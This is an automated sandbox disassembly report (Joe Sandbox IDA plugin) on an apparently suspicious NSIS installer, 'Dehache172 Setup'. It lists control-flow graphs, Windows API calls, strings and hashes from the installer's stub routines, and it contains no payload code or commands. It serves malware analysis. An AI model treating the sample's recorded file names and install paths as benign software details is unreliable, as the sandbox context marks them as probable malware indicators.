                                                                                                                                                              control_flow_graph 185 403ca7-403cb9 186 403dfa-403e09 185->186 187 403cbf-403cc5 185->187 189 403e58-403e6d 186->189 190 403e0b-403e53 GetDlgItem * 2 call 40417b SetClassLongA call 40140b 186->190 187->186 188 403ccb-403cd4 187->188 191 403cd6-403ce3 SetWindowPos 188->191 192 403ce9-403cec 188->192 194 403ead-403eb2 call 4041c7 189->194 195 403e6f-403e72 189->195 190->189 191->192 197 403d06-403d0c 192->197 198 403cee-403d00 ShowWindow 192->198 202 403eb7-403ed2 194->202 200 403e74-403e7f call 401389 195->200 201 403ea5-403ea7 195->201 203 403d28-403d2b 197->203 204 403d0e-403d23 DestroyWindow 197->204 198->197 200->201 222 403e81-403ea0 SendMessageA 200->222 201->194 207 404148 201->207 208 403ed4-403ed6 call 40140b 202->208 209 403edb-403ee1 202->209 213 403d2d-403d39 SetWindowLongA 203->213 214 403d3e-403d44 203->214 210 404125-40412b 204->210 212 40414a-404151 207->212 208->209 218 404106-40411f DestroyWindow EndDialog 209->218 219 403ee7-403ef2 209->219 210->207 217 40412d-404133 210->217 213->212 220 403de7-403df5 call 4041e2 214->220 221 403d4a-403d5b GetDlgItem 214->221 217->207 224 404135-40413e ShowWindow 217->224 218->210 219->218 225 403ef8-403f45 call 40618a call 40417b * 3 GetDlgItem 219->225 220->212 226 403d7a-403d7d 221->226 227 403d5d-403d74 SendMessageA IsWindowEnabled 221->227 222->212 224->207 255 403f47-403f4c 225->255 256 403f4f-403f8b ShowWindow KiUserCallbackDispatcher call 40419d EnableWindow 225->256 230 403d82-403d85 226->230 231 403d7f-403d80 226->231 227->207 227->226 234 403d93-403d98 230->234 235 403d87-403d8d 230->235 233 403db0-403db5 call 404154 231->233 233->220 236 403dce-403de1 SendMessageA 234->236 238 403d9a-403da0 234->238 235->236 237 403d8f-403d91 235->237 236->220 237->233 241 403da2-403da8 call 40140b 238->241 242 403db7-403dc0 call 40140b 238->242 251 403dae 241->251 242->220 252 403dc2-403dcc 242->252 251->233 252->251 255->256 259 403f90 256->259 260 403f8d-403f8e 256->260 261 403f92-403fc0 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403fc2-403fd3 SendMessageA 261->262 263 403fd5 261->263 264 403fdb-404015 call 4041b0 call 403c88 call 4060f7 lstrlenA call 40618a SetWindowTextA call 401389 262->264 263->264 264->202 275 40401b-40401d 264->275 275->202 276 404023-404027 275->276 277 404046-40405a DestroyWindow 276->277 278 404029-40402f 276->278 277->210 280 404060-40408d CreateDialogParamA 277->280 278->207 279 404035-40403b 278->279 279->202 281 404041 279->281 280->210 282 404093-4040ea call 40417b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->207 282->207 287 4040ec-4040ff ShowWindow call 4041c7 282->287 289 404104 287->289 289->210
                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403D00
                                                                                                                                                              • DestroyWindow.USER32 ref: 00403D14
                                                                                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403D51
                                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403E1A
                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                                                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403E8F
                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F68
                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F99
                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403FB8
                                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                                                                                                              • lstrlenA.KERNEL32(Dehache172 Setup: Installing,?,Dehache172 Setup: Installing,00000000), ref: 00403FF5
                                                                                                                                                              • SetWindowTextA.USER32(?,Dehache172 Setup: Installing), ref: 00404004
                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                              • String ID: Dehache172 Setup: Installing$t}v
                                                                                                                                                              • API String ID: 3282139019-1928074025
                                                                                                                                                              • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                                                                                                              • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                                                                                                              • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                                                                                                              • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 290 40390a-403922 call 406500 293 403924-403934 call 406055 290->293 294 403936-403967 call 405fde 290->294 301 40398a-4039b3 call 403bcf call 405b7d 293->301 299 403969-40397a call 405fde 294->299 300 40397f-403985 lstrcatA 294->300 299->300 300->301 308 4039b9-4039be 301->308 309 403a3a-403a42 call 405b7d 301->309 308->309 310 4039c0-4039d8 call 405fde 308->310 315 403a50-403a75 LoadImageA 309->315 316 403a44-403a4b call 40618a 309->316 314 4039dd-4039e4 310->314 314->309 317 4039e6-4039e8 314->317 319 403af6-403afe call 40140b 315->319 320 403a77-403aa7 RegisterClassA 315->320 316->315 322 4039f9-403a05 lstrlenA 317->322 323 4039ea-4039f7 call 405aba 317->323 332 403b00-403b03 319->332 333 403b08-403b13 call 403bcf 319->333 324 403bc5 320->324 325 403aad-403af1 SystemParametersInfoA CreateWindowExA 320->325 329 403a07-403a15 lstrcmpiA 322->329 330 403a2d-403a35 call 405a8f call 4060f7 322->330 323->322 328 403bc7-403bce 324->328 325->319 329->330 331 403a17-403a21 GetFileAttributesA 329->331 330->309 336 403a23-403a25 331->336 337 403a27-403a28 call 405ad6 331->337 332->328 343 403b19-403b33 ShowWindow call 406492 333->343 344 403b9c-403b9d call 4052f0 333->344 336->330 336->337 337->330 351 403b35-403b3a call 406492 343->351 352 403b3f-403b51 GetClassInfoA 343->352 347 403ba2-403ba4 344->347 349 403ba6-403bac 347->349 350 403bbe-403bc0 call 40140b 347->350 349->332 353 403bb2-403bb9 call 40140b 349->353 350->324 351->352 356 403b53-403b63 GetClassInfoA RegisterClassA 352->356 357 403b69-403b8c DialogBoxParamA call 40140b 352->357 353->332 356->357 360 403b91-403b9a call 40385a 357->360 360->328
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                                                                                                • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                                                                                              • lstrcatA.KERNEL32(1033,Dehache172 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Dehache172 Setup: Installing,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe",00000000), ref: 00403985
                                                                                                                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Annegrete,1033,Dehache172 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Dehache172 Setup: Installing,00000000,00000002,74DF3410), ref: 004039FA
                                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                                                                                                              • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                                                                                                              • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Annegrete), ref: 00403A61
                                                                                                                                                                • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                                                                                                              • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                                                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                                                                                                              • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                                                                                                              • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Annegrete$Call$Control Panel\Desktop\ResourceLocale$Dehache172 Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                              • API String ID: 1975747703-1700261007
                                                                                                                                                              • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                                                                                                              • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                                                                                                              • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                                                                                                              • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 364 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 367 402ef1-402ef6 364->367 368 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 364->368 369 4030d1-4030d5 367->369 376 403014-403022 call 402e3d 368->376 377 402f2f 368->377 384 403024-403027 376->384 385 403077-40307c 376->385 378 402f34-402f4b 377->378 380 402f4d 378->380 381 402f4f-402f58 call 4032ea 378->381 380->381 390 40307e-403086 call 402e3d 381->390 391 402f5e-402f65 381->391 386 403029-403041 call 403300 call 4032ea 384->386 387 40304b-403075 GlobalAlloc call 403300 call 4030d8 384->387 385->369 386->385 410 403043-403049 386->410 387->385 415 403088-403099 387->415 390->385 394 402fe1-402fe5 391->394 395 402f67-402f7b call 405c4b 391->395 399 402fe7-402fee call 402e3d 394->399 400 402fef-402ff5 394->400 395->400 413 402f7d-402f84 395->413 399->400 406 403004-40300c 400->406 407 402ff7-403001 call 4065b7 400->407 406->378 414 403012 406->414 407->406 410->385 410->387 413->400 419 402f86-402f8d 413->419 414->376 416 4030a1-4030a6 415->416 417 40309b 415->417 420 4030a7-4030ad 416->420 417->416 419->400 421 402f8f-402f96 419->421 420->420 422 4030af-4030ca SetFilePointer call 405c4b 420->422 421->400 423 402f98-402f9f 421->423 426 4030cf 422->426 423->400 425 402fa1-402fc1 423->425 425->385 427 402fc7-402fcb 425->427 426->369 428 402fd3-402fdb 427->428 429 402fcd-402fd1 427->429 428->400 430 402fdd-402fdf 428->430 429->414 429->428 430->400
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EB2
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,00000400), ref: 00402ECE
                                                                                                                                                                • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,80000000,00000003), ref: 00405C94
                                                                                                                                                                • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,80000000,00000003), ref: 00402F1A
                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                                                                                                              Strings
                                                                                                                                                              • soft, xrefs: 00402F8F
                                                                                                                                                              • Null, xrefs: 00402F98
                                                                                                                                                              • Inst, xrefs: 00402F86
                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                                                                                                                              • Error launching installer, xrefs: 00402EF1
                                                                                                                                                              • C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                                                                                                                                              • "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe", xrefs: 00402EA1
                                                                                                                                                              • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                                                                                                                                              • @TA, xrefs: 00402F2F
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                              • API String ID: 2803837635-369130629
                                                                                                                                                              • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                                                                                                              • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                                                                                                              • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                                                                                                              • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 431 40618a-406195 432 406197-4061a6 431->432 433 4061a8-4061be 431->433 432->433 434 4061c4-4061cf 433->434 435 4063af-4063b3 433->435 434->435 436 4061d5-4061dc 434->436 437 4061e1-4061eb 435->437 438 4063b9-4063c3 435->438 436->435 437->438 439 4061f1-4061f8 437->439 440 4063c5-4063c9 call 4060f7 438->440 441 4063ce-4063cf 438->441 442 4063a2 439->442 443 4061fe-406232 439->443 440->441 445 4063a4-4063aa 442->445 446 4063ac-4063ae 442->446 447 406238-406242 443->447 448 40634f-406352 443->448 445->435 446->435 449 406244-406248 447->449 450 40625c 447->450 451 406382-406385 448->451 452 406354-406357 448->452 449->450 455 40624a-40624e 449->455 458 406263-40626a 450->458 453 406393-4063a0 lstrlenA 451->453 454 406387-40638e call 40618a 451->454 456 406367-406373 call 4060f7 452->456 457 406359-406365 call 406055 452->457 453->435 454->453 455->450 460 406250-406254 455->460 469 406378-40637e 456->469 457->469 462 40626c-40626e 458->462 463 40626f-406271 458->463 460->450 465 406256-40625a 460->465 462->463 467 406273-40628e call 405fde 463->467 468 4062aa-4062ad 463->468 465->458 474 406293-406296 467->474 470 4062bd-4062c0 468->470 471 4062af-4062bb GetSystemDirectoryA 468->471 469->453 473 406380 469->473 477 4062c2-4062d0 GetWindowsDirectoryA 470->477 478 40632d-40632f 470->478 476 406331-406334 471->476 475 406347-40634d call 4063d2 473->475 479 406336-40633a 474->479 480 40629c-4062a5 call 40618a 474->480 475->453 476->475 476->479 477->478 478->476 481 4062d2-4062dc 478->481 479->475 484 40633c-406342 lstrcatA 479->484 480->476 486 4062f6-40630c SHGetSpecialFolderLocation 481->486 487 4062de-4062e1 481->487 484->475 490 40632a 486->490 491 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 486->491 487->486 489 4062e3-4062ea 487->489 492 4062f2-4062f4 489->492 490->478 491->476 491->490 492->476 492->486
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00405256,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000), ref: 004062C8
                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405256,74DF23A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00405256,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000), ref: 00406304
                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(74DF23A0,Call), ref: 00406312
                                                                                                                                                              • CoTaskMemFree.OLE32(74DF23A0), ref: 0040631E
                                                                                                                                                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                                                                                                              • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00405256,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00000000,00424248,74DF23A0), ref: 00406394
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                              • API String ID: 717251189-3785370419
                                                                                                                                                              • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                                                                                                              • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                                                                                                              • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                                                                                                              • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 562 401759-40177c call 402bce call 405afc 567 401786-401798 call 4060f7 call 405a8f lstrcatA 562->567 568 40177e-401784 call 4060f7 562->568 573 40179d-4017a3 call 4063d2 567->573 568->573 578 4017a8-4017ac 573->578 579 4017ae-4017b8 call 40646b 578->579 580 4017df-4017e2 578->580 587 4017ca-4017dc 579->587 588 4017ba-4017c8 CompareFileTime 579->588 581 4017e4-4017e5 call 405c6b 580->581 582 4017ea-401806 call 405c90 580->582 581->582 590 401808-40180b 582->590 591 40187e-4018a7 call 40521e call 4030d8 582->591 587->580 588->587 592 401860-40186a call 40521e 590->592 593 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 590->593 603 4018a9-4018ad 591->603 604 4018af-4018bb SetFileTime 591->604 605 401873-401879 592->605 593->578 625 401855-401856 593->625 603->604 607 4018c1-4018cc CloseHandle 603->607 604->607 608 402a63 605->608 610 4018d2-4018d5 607->610 611 402a5a-402a5d 607->611 612 402a65-402a69 608->612 615 4018d7-4018e8 call 40618a lstrcatA 610->615 616 4018ea-4018ed call 40618a 610->616 611->608 622 4018f2-402382 615->622 616->622 626 402387-40238c 622->626 627 402382 call 405813 622->627 625->605 628 401858-401859 625->628 626->612 627->626 628->592
                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Annegrete,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Annegrete,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Dehache172 Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                                                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00403233,00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0), ref: 0040527A
                                                                                                                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll), ref: 0040528C
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp$C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll$C:\Users\user\AppData\Roaming\Annegrete$Call
                                                                                                                                                              • API String ID: 1941528284-3216728372
                                                                                                                                                              • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                                                                                                              • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                                                                                                              • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                                                                                                              • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 629 40521e-405233 630 4052e9-4052ed 629->630 631 405239-40524b 629->631 632 405256-405262 lstrlenA 631->632 633 40524d-405251 call 40618a 631->633 635 405264-405274 lstrlenA 632->635 636 40527f-405283 632->636 633->632 635->630 637 405276-40527a lstrcatA 635->637 638 405292-405296 636->638 639 405285-40528c SetWindowTextA 636->639 637->636 640 405298-4052da SendMessageA * 3 638->640 641 4052dc-4052de 638->641 639->638 640->641 641->630 642 4052e0-4052e3 641->642 642->630
